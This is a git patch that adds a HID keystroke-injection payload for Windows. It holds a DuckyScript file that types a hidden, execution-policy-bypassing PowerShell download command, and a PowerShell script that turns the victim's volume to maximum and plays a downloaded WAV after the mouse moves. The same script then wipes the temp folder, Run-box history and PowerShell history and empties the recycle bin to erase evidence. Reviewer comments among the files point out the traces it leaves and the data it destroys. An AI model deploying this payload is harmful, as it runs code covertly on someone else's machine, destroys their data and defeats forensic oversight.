From bba4f6aa1cbc48a45c14f5ae3dab82b65a8d44fd Mon Sep 17 00:00:00 2001
From: I-Am-Jakoby
Date: Mon, 9 May 2022 22:42:50 -0500
Subject: [PATCH] Add files via upload
---
.../execution/-OMG-Play-WAV/Play-WAV-Execute | 16 +++
.../execution/-OMG-Play-WAV/Play-WAV.ps1 | 89 +++++++++++++++++
.../library/execution/-OMG-Play-WAV/README.md | 99 +++++++++++++++++++
3 files changed, 204 insertions(+)
create mode 100644 payloads/library/execution/-OMG-Play-WAV/Play-WAV-Execute
create mode 100644 payloads/library/execution/-OMG-Play-WAV/Play-WAV.ps1
create mode 100644 payloads/library/execution/-OMG-Play-WAV/README.md
diff --git a/payloads/library/execution/-OMG-Play-WAV/Play-WAV-Execute b/payloads/library/execution/-OMG-Play-WAV/Play-WAV-Execute
new file mode 100644
index 0000000..f0f6b01
--- /dev/null
+++ b/payloads/library/execution/-OMG-Play-WAV/Play-WAV-Execute
@@ -0,0 +1,16 @@
+REM Title: Play-WAV
+
+REM Author: I am Jakoby
+
+REM Description: This payload is meant to play a WAV file hidden. See Play-WAV.ps1 for more details
+
+REM Target: Windows 10, 11
+
+REM Remeber to replace the link with your link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
+
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Exec Bypass iwr https:// < Your Shared link for the intended file> ?dl=1 -O $env:TMP\e.wav
+DELAY 500
+ENTER
diff --git a/payloads/library/execution/-OMG-Play-WAV/Play-WAV.ps1 b/payloads/library/execution/-OMG-Play-WAV/Play-WAV.ps1
new file mode 100644
index 0000000..687e4a3
--- /dev/null
+++ b/payloads/library/execution/-OMG-Play-WAV/Play-WAV.ps1
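Review bot: The REM header of Play-WAV-Execute does not document what the typed command leaves on the machine; the `STRING` line is the only place a reader can see it. The command is entered through the Run dialog (`GUI r`), starts `powershell -w h -NoP -NonI -Exec Bypass`, and writes `$env:TMP\e.wav`, so a header line such as `REM Artifacts: Run dialog history entry, hidden PowerShell process, %TMP%\e.wav` would tell testers and responders what to expect. That same command line (hidden window, execution-policy bypass, `iwr` to a file-sharing link) is what process-creation logging would record, which is worth stating plainly in the description. Also fix the typo `Remeber` → `Remember` in the REM comment.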
@@ -0,0 +1,89 @@ +############################################################################################################################################################ +# | ___ _ _ _ # ,d88b.d88b # +# Title : Play-WAV | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # +# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # +# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # +# Category : Execution | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # +# Target : Windows 10,11 | |___/ # /\/|_ __/\\ # +# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # +# Dependencies : Dropbox | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # +# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # +# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # +#__________________________________|_________________________________________________________________________# | | ) ~ ( # +# # / \ / ~ \ # +# github.com/I-Am-Jakoby # \ / \~ ~/ # +# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# +# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# +# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# +############################################################################################################################################################ + +<# +.NOTES + This script requires you to have a DropBox account or another file hosting service + +.DESCRIPTION + This program downloads a sound from your DropBox + Turns the volume to max level on victims PC + Pauses the script until a mouse movement is detected + Then plays the sound with nothing popping up catching your victim off guard + Finally a few lines of script are executed to empty TMP folder, clear Run and Powershell history + +#> + 
+############################################################################################################################################################ + +# Download Sound (When using your own link "dl=0" needs to be changed to "dl=1") +iwr https:// ?dl=1 -O $env:TMP\e.wav + +############################################################################################################################################################ + +# This turns the volume up to max level +$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)} + +############################################################################################################################################################ + +# This while loop will constantly check if the mouse has been moved +# if the mouse has not moved "SCROLLLOCK" will be pressed to prevent screen from turning off +# it will then sleep for the indicated number of seconds and check again + +Add-Type -AssemblyName System.Windows.Forms +$originalPOS = [System.Windows.Forms.Cursor]::Position.X + + while (1) { + $pauseTime = 3 + if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){ + break + } + else { + $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime + } + } +############################################################################################################################################################ + +# Play Sound +$PlayWav=New-Object System.Media.SoundPlayer;$PlayWav.SoundLocation="$env:TMP\e.wav";$PlayWav.playsync() + +############################################################################################################################################################ + +<# + +.NOTES + This is to clean up behind you and remove any evidence to prove you were there +#> + +# Delete contents of Temp folder + +rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue + +# Delete run box history + +reg delete 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f + +# Delete powershell history + +Remove-Item (Get-PSreadlineOption).HistorySavePath + +# Deletes contents of recycle bin + +Clear-RecycleBin -Force -ErrorAction SilentlyContinue + diff --git a/payloads/library/execution/-OMG-Play-WAV/README.md b/payloads/library/execution/-OMG-Play-WAV/README.md new file mode 100644 index 0000000..66ebbab --- /dev/null +++ b/payloads/library/execution/-OMG-Play-WAV/README.md @@ -0,0 +1,99 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + +
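Review bot: The cleanup section at the end of Play-WAV.ps1 destroys data the script never created: `rm $env:TEMP\* -r -Force` wipes the user's whole temp directory, `Remove-Item (Get-PSreadlineOption).HistorySavePath` deletes the entire PowerShell history file, and `Clear-RecycleBin -Force` makes previously deleted files unrecoverable. The README description mentions none of this, so the operator causes data loss on the target that the documentation never announced. Limit removal to the one artefact written here, `Remove-Item "$env:TMP\e.wav" -ErrorAction SilentlyContinue`, and drop the recycle-bin and history lines. The `.NOTES` wording "remove any evidence" also overstates what these commands do, since process-creation and script-block logs (where enabled) are untouched and remain the place for responders to look. Separately, the comment above the loop says SCROLLLOCK while the code sends `{CAPSLOCK}`; the comment should name the key actually sent.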
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Play-WAV + +A script used to download a WAV file and play it after a mouse movement is detected + +## Description + +This program starts off by using an Invoke-WebRequest to download a WAV file +The system volume is then turned up to the max level +Then the script will be paused until a mouse movement is detected +After one is the WAV file will be played + +## Getting Started + +### Dependencies + +* DropBox - Your Shared link for the intended file +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download your WAV file +``` +powershell -w h -NoP -NonI -Exec Bypass iwr https:// < Your Shared link for the intended file> ?dl=1 -O $env:TMP\e.wav +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

I am Jakoby

+


+ + + + + + + + + + + + + + + + + + + + Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-Play-WAV) +

+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + + +

(back to top)